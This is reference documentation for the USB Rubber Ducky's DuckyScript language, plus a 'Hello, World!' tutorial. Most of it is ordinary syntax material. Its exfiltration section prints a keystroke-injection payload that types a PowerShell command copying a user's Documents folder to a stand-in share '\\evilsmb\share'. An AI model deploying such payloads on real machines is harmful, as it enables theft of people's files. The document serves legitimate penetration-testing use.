[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#var)
The `VAR` command will initiate a variable. Unlike constants, variables begin with a dollar sign ("`$`"). Variables contain unsigned integers with values from 0 to 65535. Booleans may be represented as well, either by `TRUE`/`FALE` or any non-zero number and `0` respectively.
VAR $BLINK = TRUE
VAR $BLINK_TIME = 1000
[Operators](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#operators)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Operators instruct the payload to perform a given mathematical, relational or logical operation.
### [Math](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#math-operators)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#math)
| Operator | Meaning |
| --- | --- |
| \= | Assignment |
| + | Add |
| \- | Subtract |
| \* | Multiply |
| / | Divide |
| % | Modulus |
| ^ | Exponent |
VAR $FOO = 1337
$FOO = ( $FOO - 1295 )
REM $FOO was assigned 1337, subtracted 1295, and ended up equalling 42.
### [Comparison](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#comparison-operators)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#comparison)
Will compare two values to evaluate a single boolean value.
| Operator | Meaning |
| --- | --- |
| \== | Equal to |
| != | Not equal to |
| \> | Greater than |
| < | Less than |
| \>= | Greater than or equal to |
| <= | Less than or equal to |
VAR $FOO = 42
VAR $BAR = 1337
IF ( $FOO < $BAR ) THEN
STRING 42 is less than 1337
END_IF
### [Order of Operations](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#order-of-operations)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#order-of-operations)
Parentheses `( )` are required to define the precedence conventions.
VAR $FOO = 42
VAR $BAR = (( 100 * 13 ) + ( $FOO - 5 ))
### [Logical Operators](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#logical-operators)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#logical-operators)
Logical operators may be used to connect two or more expressions.
| Operator | Description |
| --- | --- |
| && | Logical AND. If both the operands are non-zero, the condition is `TRUE`. |
| \| | Logical OR. If any of the two operands is non-zero, the condition is `TRUE`. |
VAR $FOO = 42
VAR $BAR = 1337
IF ( $FOO < $BAR ) || ( $BAR == $FOO ) THEN
STRING Either 42 is less than 1337 or 42 is equal to 1337
END_IF
### [Augmented Assignment](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#augmented-assignment-operators)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#augmented-assignment)
When assigning a value to a variable, the variable itself may be referenced.
VAR $FOO = 1336
VAR $FOO = ( $FOO + 1 )
### [Bitwise Operators](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/operators/#bitwise-operators)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#bitwise-operators)
Operate on the uint16 values at the binary level.
| Operator | Description |
| --- | --- |
| & | Bitwise AND. If the corresponding bits of the two operands is 1, will result in 1. Otherwise if either bit of an operand is 0, the result of the corresponding bit is evaluated as 0. |
| \| | Bitwise OR. If at least one corresponding bit of the two operands is 1, will result in 1. |
| \>> | Right Shift. Accepts two numbers. Right shifts the bits of the first operand. The second operand determines the number of places to shift. |
| << | Left Shift. Accepts two numbers. Left shifts the bits of the first operand. The second operand decides the number of places to shift. |
ATTACKMODE HID STORAGE VID_05AC PID_021E
VAR $FOO = $_CURRENT_VID
REM Because VID and PID parameters are little endian,
$FOO = ((($FOO >> 8) & 0x00FF) | (($FOO << 8) & 0xFF00))
REM $FOO will now equal 0xAC05
[Conditional Statements](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#conditional-statements)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Conditional statements, loops and functions allow for dynamic execution.
### [`IF`](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#if)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#if)
The flow control statement `IF` will determine whether or not to execute its block of code based on the evaluation of an expression. One way to interpret an `IF` statement is to read it as “`IF` this condition is true, `THEN` do this”.
$FOO = 42
$BAR = 1337
IF ( $FOO < $BAR ) THEN
STRING 42 is less than 1337
END_IF
### [`ELSE`](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements/#else)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#else)
The `ELSE` statement is an optional component of the `IF` statement which will only execute when the `IF` statement condition is `FALSE`.
IF ( $_CAPSLOCK_ON == TRUE ) THEN
STRING Capslock is on!
ELSE IF ( $_CAPSLOCK_ON == FALSE ) THEN
STRING Capslock is off!
END_IF
[Loops](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#loops)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Loops are flow control statements that can be used to repeat instructions until a specific condition is reached.
### [`WHILE`](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops/#while)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#while)
The block of code within the `WHILE` statement will continue to repeatedly execute for a number of times (called iterations) for as long as the condition of the `WHILE` statement is `TRUE`.
VAR $FOO = 42
WHILE ( $FOO > 0 )
STRINGLN This message will repeat 42 times.
$FOO = ( $FOO - 1 )
END_WHILE
WHILE TRUE
SRINGLN This is an infinite loop. This message repeats forever.
END_WHILE
[Functions](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#functions)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Functions are blocks of organized single-task code that let you more efficiently run the same code multiple times without the need to copy and paste large blocks of code over and over again.
### [`FUNCTION`](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#function)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#function)
REM Types "Hello.....World!"
FUNCTION COUNTDOWN()
WHILE ($TIMER > 0)
STRING .
$TIMER = ($TIMER - 1)
DELAY 500
END_WHILE
END_FUNCTION
STRING Hello
VAR $TIMER = 5
COUNTDOWN()
STRING World!
### [`RETURN`](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions/#return-values)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#return)
A function may return a integer or boolean value which may also be evaluated.
FUNCITON TEST_CAPS_AND_NUM()
IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == TRUE)) THEN
RETURN TRUE
ELSE
RETURN FALSE
END_IF
END_FUNCTION
IF (TEST_CAPS_AND_NUM() == TRUE) THEN
STRINGLN Caps lock and num lock are on.
END_IF
[Randomization](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#randomization)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The pseudorandom number generator provides randomization for keystroke injection, variables and attackmode parameters. The first time a randomization feature is used, a `seed.bin` will be generated on the root of the MicroSD card. One may also be generated from the [Hak5 IDE](https://encoder.hak5.org/)
.
### [Random Keystroke Injection](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#random-keystroke-injection)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#random-keystroke-injection)
| Command | Character Set |
| --- | --- |
| `RANDOM_LOWERCASE_LETTER` | abcdefghijklmnopqrstuvwxyz |
| `RANDOM_UPPERCASE_LETTER` | ABCDEFGHIJKLMNOPQRSTUVWXYZ |
| `RANDOM_LETTER` | abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ |
| `RANDOM_NUMBER` | 0123456789 |
| `RANDOM_SPECIAL` | !@#$%^&\*() |
| `RANDOM_CHAR` | abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789 !@#$%^&\*() |
REM 42 random characters
VAR $COUNT = 42
WHILE ($COUNT > 0)
RANDOM_CHAR
$COUNT = ($COUNT + 1)
END_WHILE
### [Random Integers](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#random-integers)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#random-integers)
The internal variable `$_RANDOM_INT` assigns a random integer between the specified `$_RANDOM_MIN` and `$_RANDOM_MAX` values. May be 0-65535. The default values are `0-9`.
$_RANDOM_MIN = 42
$_RANDOM_MAX = 1337
VAR $FOO = $_RANDOM_INT
REM The variable $FOO will be between 42 and 1337
### [Random and ATTACKMODE](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization/#random-and-attackmode)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#random-and-attackmode)
The `ATTACKMODE` command may accept random values for the optional parameters.
| ATTACKMODE Parameter | Result |
| --- | --- |
| `VID_RANDOM` | Random Vendor ID |
| `PID_RANDOM` | Random Product ID |
| `MAN_RANDOM` | Random 12 alphanumeric character iManufacturer |
| `PROD_RANDOM` | Random 12 alphanumeric character iProduct |
| `SERIAL_RANDOM` | Random 12 digit serial number |
ATTACKMODE HID VID_RANDOM PID_RANDOM MAN_RANDOM PROD_RANDOM SERIAL_RANDOM
report
Use caution when using random `VID` and `PID` values as unexpected results are likely.
[Holding Keys](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#holding-keys)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
A key may be held, rather than pressed, by specifying a `HOLD` and `RELEASE` command with a `DELAY` in between the two. Both `HOLD` and `RELEASE` must specify a key. [Multiple simultaneous keys](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/#holding-multiple-keys)
may be held.
HOLD a
DELAY 2000
RELEASE a
REM May produce any mumber of "aaaaa" keys, depending on the repeat rate of
REM the target OS. On macOS may open the accent menu.
INJECT_MOD
HOLD WINDOWS
DELAY 4000
RELEASE WINDOWS
REM Will hold the Windows key for 4 seconds. Note the use of INJECT_MOD
REM when using a modifier key without a key combination.
[Payload Control](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#payload-control)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
These simple commands exist to control the execution of a payload.
### [`RESTART_PAYLOAD`](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#restart_payload)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#restart_payload)
The `RESTART_PAYLOAD` command ceases execution, restarting the payload from the beginning.
### [STOP\_PAYLOAD](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#stop_payload)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#stop_payload)
The `STOP_PAYLOAD` command ceases and further execution.
### [RESET](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#reset)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#reset)
The `RESET` command clears the keystroke buffer, useful for debugging complex hold key states.
[Jitter](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#jitter)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Jitter randomly varies the delay between individual key presses based on the `seed.bin` value.
| Internal Variable | Description |
| --- | --- |
| `$_JITTER_ENABLED` | Set `TRUE` to enable and `FALSE` to disable jitter. |
| `$_JITTER_MAX` | Integer (0-65535) of maximum time in milliseconds between keystrokes. Default 20. |
$_JITTER_MAX = 60
$_JITTER_ENABLED = TRUE
STRINGLN The quick brown fox jumps over the lazy dog
[Payload Hiding](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-hiding/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#payload-hiding)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The `inject.bin` and `seed.bin` file may be hidden from the MicroSD card before implementing `ATTACKMODE STORAGE`. The `HIDE_PAYLOAD` and `RESTORE_PAYLOAD` commands must be run while using `ATTACKMODE OFF` or `ATTACKMODE HID`.
### [`HIDE_PAYLOAD`](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-hiding/#hide_payload-and-restore_payload)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#hide_payload)
Hides the inject.bin and seed.bin files from the MicroSD card.
### [`RESTORE_PAYLOAD`](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-hiding/#hide_payload-and-restore_payload)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#restore_payload)
Restores the inject.bin and seed.bin files to the MicroSD card.
ATTACKMODE OFF
HIDE_PAYLOAD
ATTACKMODE HID STORAGE
DELAY 2000
STRINGLN The payload files are hidden.
ATTACKMODE HID
RESTORE_PAYLOAD
DELAY 2000
STRINGLN Restoring the payload files...
ATTACKMODE HID STORAGE
DELAY 2000
STRINGLN The payload files have been restored.
[Lock Keys](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#lock-keys-1)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
USB HID devices contain both IN endpoints for data (keystrokes) from the keyboard to computer, and OUT endpoints for data (LED states) from the computer to the keyboard. In many cases the LED state control codes sent from the computer to the attached keyboard are sent to all attached “keyboards”. Versions of macOS behave differently.
### [`WAIT_FOR` Commands](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#wait_for-commands)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#wait_for)
| Command | Description |
| --- | --- |
| `WAIT_FOR_CAPS_ON` | Pause until caps lock is turned on |
| `WAIT_FOR_CAPS_OFF` | Pause until caps lock is turned off |
| `WAIT_FOR_CAPS_CHANGE` | Pause until caps lock is toggled on or off |
| `WAIT_FOR_NUM_ON` | Pause until num lock is turned on |
| `WAIT_FOR_NUM_OFF` | Pause until num lock is turned off |
| `WAIT_FOR_NUM_CHANGE` | Pause until num lock is toggled on or off |
| `WAIT_FOR_SCROLL_ON` | Pause until scroll lock is turned on |
| `WAIT_FOR_SCROLL_OFF` | Pause until scroll lock is turned off |
| `WAIT_FOR_SCROLL_CHANGE` | Pause until scroll lock is toggled on or off |
STRINGLN Hello,
STRINGLN [Press caps lock to continue...]
WAIT_FOR_CAPS_CHANGE
STRINGLN World!
### [`SAVE` and `RESTORE` Commands](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#save-and-restore-commands)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#save)
The currently reported lock key states may be saved and later recalled using the `SAVE_HOST_KEYBOARD_LOCK_STATE` and `RESTORE_HOST_KEYBOARD_LOCK_STATE` commands.
REM Save the LED states of the primary keyboard
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Change the lock states
CAPSLOCK
NUMLOCK
REM Restore the original lock states
RESTORE_HOST_KEYBOARD_LOCK_STATE
[Exfiltration](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#exfiltration)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exfiltration is the unauthorized transfer of information from a system. Typically performed over a [physical medium](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#physical-medium-exfiltration)
(copying to a USB flash disk such as the USB Rubber Ducky while using `ATTACKMODE STORAGE`) or a [network medium](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#network-medium-exfiltration)
such as email, ftp, smb, http, etc.
### Physical Exfiltration Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#physical-exfiltration-example)
ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 100
STRING powershell "$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRINGLN echo $env:computername >> $m:\computer_names.txt"
### Network Exfiltration Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#network-exfiltration-example)
ATTACKMODE HID
DELAY 2000
GUI r
DELAY 100
STRINGLN powershell "cp -r $env:USERPROFILE\Documents\* \\evilsmb\share"
### [Keystroke Reflection](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#the-keystroke-reflection-attack)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#keystroke-reflection)
By taking advantage of the [HID OUT endpoint](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#end-points-and-control-codes)
as described in the [lock keys](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/)
section, binary data may be exfiltrated “out of band” using the Keystroke Reflection side-channel attack. This is done by using the `$_EXFIL_MODE_ENABLED` internal variable. The reflected lock keystrokes are saved to [`loot.bin`](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#working-with-loot)
on the root of the MicroSD card. For a detailed example, see the section on [Keystroke Reflection](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#the-keystroke-reflection-attack)
.
### [Variable Exfiltration](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#variable-exfiltration)
[_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#variable-exfiltration)
Similarly, arbitrary variable data may be saved to the `loot.bin` file using the `EXFIL` command.
VAR $FOO = 1337
EXFIL $FOO
Internal Variables [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/#internal-variables)
-------------------------------------------------------------------------------------------------------------------------
| Internal Variable | Description |
| --- | --- |
| **BUTTON** | |
| `$_BUTTON_ENABLED` | Returns `TRUE` if the button is enabled or `FALSE` if the button is disabled. |
| `$_BUTTON_USER_DEFINED` | Returns `TRUE` if a `BUTTON_DEF` has been implemented in the payload or `FALSE` if it hasn't been implemented. |
| `$_BUTTON_PUSH_RECEIVED` | Returns `TRUE` if the button has ever been pressed. May be retrieved or set. |
| `$_BUTTON_TIMEOUT` | The button debounce, or cooldown time before counting the next button press, in milliseconds. The default value is `1000`. |
| **LED** | |
| `$_SYSTEM_LEDS_ENABLED` | Default set `TRUE`. May be retrieved or set. Boot and `ATTACKMODE` change LED. |
| `$_STORAGE_LEDS_ENABLED` | Default set `TRUE`. May be retrieved or set. Blinks the LED red/green on storage read/write in `ATTACKMODE STORAGE`. |
| `$_LED_CONTINUOUS_SHOW_STORAGE_ACTIVITY` | Default set `TRUE`. May be retrieved or set. The LED will light solid green when the storage has been inactive for longer than $`_STORAGE_ACTIVITY_TIMEOUT` (default 1000 ms). Otherwise, the LED will light red when active. |
| `$_INJECTING_LEDS_ENABLED` | Default set `TRUE`. May be retrieved or set. When `TRUE` the LED will blink green on payload execution. |
| `$_EXFIL_LEDS_ENABLED` | Default set `TRUE`. May be retrieved or set. When `TRUE` the LED will blink green during Keystroke Reflection. |
| `$_LED_SHOW_CAPS` | Default set `FALSE`. May be retrieved or set. When `TRUE` will bind the GREEN LED state to the `CAPSLOCK` state. |
| `$_LED_SHOW_NUM` | Default set `FALSE`. May be retrieved or set. When `TRUE` will bind the RED LED state to the `NUMLOCK` state. |
| `$_LED_SHOW_SCROLL` | Default set `FALSE`. May be retrieved or set. When `TRUE` will bind the GREEN LED state to the `SCROLLLOCK` state. |
| **ATTACKMODE** | |
| `$_CURRENT_VID` | Returns the currently operating Vendor ID with endian swapped. May only be retrieved. Cannot be set. |
| `$_CURRENT_PID` | Returns the currently operating Product ID with endian swapped. May only be retrieved. Cannot be set. |
| `$_CURRENT_ATTACKMODE` | Returns the currently operating ATTACKMODE represented as `0` for `OFF`, `1` for `HID`, `2` for STORAGE and `3` for both `HID` and `STORAGE` |
| **RANDOM** | |
| `$_RANDOM_INT` | Random integer within set range. |
| `$_RANDOM_MIN` | Random integer minimum range (unsigned, 0-65535) |
| `$_RANDOM_MAX` | Random integer maximum range (unsigned, 0-65535) |
| `$_RANDOM_SEED` | Random seed from `seed.bin` |
| `$_RANDOM_LOWER_LETTER_KEYCODE` | Returns random lower letter scancode (a-z) |
| `$_RANDOM_UPPER_LETTER_KEYCODE` | Returns random upper letter scancode (A-Z) |
| `$_RANDOM_LETTER_KEYCODE` | Returns random letter scancode (a-zA-Z) |
| `$_RANDOM_NUMBER_KEYCODE` | Returns random number scancode (0-9) |
| `$_RANDOM_SPECIAL_KEYCODE` | Returns random special char scancode (shift+0-9) |
| `$_RANDOM_CHAR_KEYCODE` | Returns random letter number or special scancode |
| **JITTER** | |
| `$_JITTER_ENABLED` | Set `TRUE` to enable jitter. Default `FALSE`. |
| `$_JITTER_MAX` | Sets the maximum time between key presses in milliseconds. The default maximum is 20 ms. |
| **LOCK KEYS** | |
| `$_CAPSLOCK_ON` | `TRUE` if on, `FALSE` if off. |
| `$_NUMLOCK_ON` | `TRUE` if on, `FALSE` if off. |
| `$_SCROLLLOCK_ON` | `TRUE` if on, `FALSE` if off. |
| `$_SAVED_CAPSLOCK_ON` | On USB attach or `SAVE_HOST_KEYBOARD_LOCK_STATE`, sets `TRUE` or `FALSE` depending on the reported OS condition. |
| `$_SAVED_NUMLOCK_ON` | On USB attach or `SAVE_HOST_KEYBOARD_LOCK_STATE`, sets `TRUE` or `FALSE` depending on the reported OS condition. |
| `$_SAVED_SCROLLLOCK_ON` | On USB attach or `SAVE_HOST_KEYBOARD_LOCK_STATE`, sets `TRUE` or `FALSE` depending on the reported OS condition. |
| `$_RECEIVED_HOST_LOCK_LED_REPLY` | On receipt of any lock state LED control code, sets `TRUE`. This flag is helpful for fingerprinting certain operating systems (e.g. macOS) or systems which do not reflect lock keys. |
| **STORAGE** | |
| `$_STORAGE_ACTIVITY_TIMEOUT` | As payload is running, this value decrements if storage activity is not detected. Default value is 1000. |
| **EXFILTRATION** | |
| `$_EXFIL_MODE_ENABLED` | Default `FALSE`. Set `TRUE` to enable Keystroke Reflection. Will listen for `CAPSLOCK` and `NUMLOCK` changes, writing binary values to loot.bin. num=1, caps=0. |
| **OS\_DETECT** | |
| `$_HOST_CONFIGURATION_REQUEST_COUNT` | Used by `OS_DETECT` `EXTENSION` to detect device enumeration count. |
| `$_OS` | Used by `OS_DETECT` `EXTENSION` to return value of fingerprinted operating system. May return `WINDOWS`, `MACOS`, `LINUX`, `CHROMEOS`, `ANDROID`, `IOS`. These names are reserved and should not be used in user variables. |
* * *
[_navigate\_before_ USB Rubber Ducky by Hak5](https://docs.hak5.org/hak5-usb-rubber-ducky/usb-rubber-ducky-by-hak5/)
[Unboxing "Quack-Start" Guide _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/)
---
# DUCKY SCRIPT BASICS | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
DUCKY SCRIPT BASICS
===================
* * *
---
# Hello, World! | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Hello, World!
=============
No introduction to a programming language would be complete without a “Hello, World!” example. Call it cliché, but this ubiquitous example makes for a welcoming DuckyScript initiation.
While the new DuckyScript 3.0 introduces a ton of new features, it does so by building on the simplicity of the original DuckyScript language — a language which has become synonymous with the keystroke injection attack technique it invented.
So with this one “Hello, World!” example we’ll not only learn the absolute basics of the original DuckyScript language, but also the process for testing out a payload.
Key Terms [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/#key-terms)
-----------------------------------------------------------------------------------------------------------
* **Keystroke Injection** — a type of hotplug attack which mimics keystrokes entered by a human.
* **Hotplug Attack** — an attack or automated task that takes advantage of plug-and-play.
* **Plug and Play** — a peripheral standard whereby connected devices work automatically.
* **HID** — a Human Interface Device; the protocol a keyboard uses to speak to a computer
* **Mass Storage** — what we think of as a thumb drive or SD Card
* **USB Rubber Ducky** — the USB device that delivers hotplug attacks.
* **Payload** — the specific hotplug attack instructions processed by the USB Rubber Ducky.
* **DuckyScript** — both the programming language of, and source code for USB Rubber Ducky payloads. May refer to a specific payload in human-readable DuckyScript source code.
* **inject.bin** — the binary equivalent of the DuckyScript source code generated by the compiler and encoder consisting of byte code to be interpreted by the USB Rubber Ducky.
* **Payload Studio** — Integrated Development Environment consisting of a source code editor, compiler, encoder and debugger for programming DuckyScript.
* **Editor** — the text processing element of the Payload Studio featuring syntax highlighting, autocomplete, indentation and snippets specific to the DuckyScript programming language.
* **Compiler** — the element of the Payload Studio which converts the DuckyScript source code (payload.txt) into the byte code (inject.bin) interpreted by the USB Rubber Ducky. The Compiler also tests the DuckyScript source to be syntactically correct. May provide warning or error messages if a programming bug is found.
* **Debugger** — the element of the Payload Studio which may be used to help you test or troubleshoot your payload.
* **Language File** — also referred to as the Language JSON, this is the lookup table the Compiler uses to encode your keystrokes for a given keyboard language
* **Loot** — the logs, data and other information obtained during the deployment of a payload, often consisting of details about the target (recon) or information from the target (exfiltration).
* **Arming** — the act of transferring a payload to the hotplug attack device.
* **Arming Mode** — a mode whereby the USB Rubber Ducky facilitates convenient payload and loot transfer by acting as USB mass storage.
* **Target** — the computing device (or “Host”) on which the payload will be deployed.
* **Deployment** — the execution of the payload on the target.
Learn Original DuckyScript In Just 4 Lines [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/#learn-original-duckyscript-in-just-4-lines)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Learn the basics of the original DuckyScript language from this one example alone.
REM My first payload
DELAY 3000
STRING Hello, World!
ENTER
As you might imagine, this payload types “Hello, World!”.
Testing Your Payload [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/#testing-your-payload)
---------------------------------------------------------------------------------------------------------------------------------
With the new terms in mind, let’s try out the Hello World example by following these steps:
1. Plug the _USB Rubber Ducky_ into your computer. If it doesn’t show up as a flash drive automatically, press the button to enter _arming mode_.
2. Copy the _DuckyScript_ source code of the Hello World example _payload_.
3. Paste it into a blank new project from the _editor_ in _Payload Studio_.
4. Click **Generate Payload** to _compile_ the _payload_.
5. Click **Download Payload** to save the _`inject.bin`_ file.
6. Copy the _`inject.bin`_ file to the root of the USB Rubber Ducky drive. **Ensure the name is exactly** `inject.bin`.
7. Unplug the newly _armed_ _USB Rubber Ducky_ from your computer.
8. Open a text editor on the _target._ This may be the same computer used for _arming_.
9. Ensure that the text area is the active window, which is usually indicated by a blinking cursor.
10. Deploy the payload against the target by plugging it into an available USB port.
11. Watch as the _keystroke injection_ _payload_ is executed by the _hotplug attack_ device.
Voilà — “`Hello, World!`”
These are the steps that will be repeated numerous times as you continue to learn and experiment with the DuckyScript language.
warning
The Payload **MUST** be named `inject.bin` **exactly.**
_No other name will function;_ `inject (2).bin` _will not work._
report
On Windows: if explorer is **NOT** set to _Show File Extensions_
When downloading your `inject.bin` do **NOT** append `.bin` to the filename _or your file will be incorrectly named`inject.bin.bin`_
A Quick Breakdown [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/#a-quick-breakdown)
---------------------------------------------------------------------------------------------------------------------------
So, let’s break down each line of this payload to understand the language and what it does.
Each line of an original DuckyScript file, or “payload” as they are known, is processed one at a time. A line may include a comment, a delay, or a key or set of keys to press. That’s it.
1. `REM` is short for Remark and adds a comment to the payload, like a title or the author’s name.
2. `DELAY` pauses the payload for a given amount of time, expressed in milliseconds.
3. `STRING` injects keystrokes, or “types”, the given characters (a-z, 0-9, punctuation & specials).
4. `ENTER` is a special key which may be pressed, like `TAB`, `ESCAPE`, `UPARROW` or even `ALT F4`.
A full list of special keys is available in the keystroke injection section — but they’re named as one might expect. Think: `BACKSPACE`, `HOME`, `INSERT`, `PAGEUP`, `F11` and the like…
That’s it! For DuckyScript 1.0 at least… [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/#thats-it-for-duckyscript-10-at-least)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
Yep. That’s it. That’s the entirety of the **original** DuckyScript 1.0 language; comments, delays and keys.
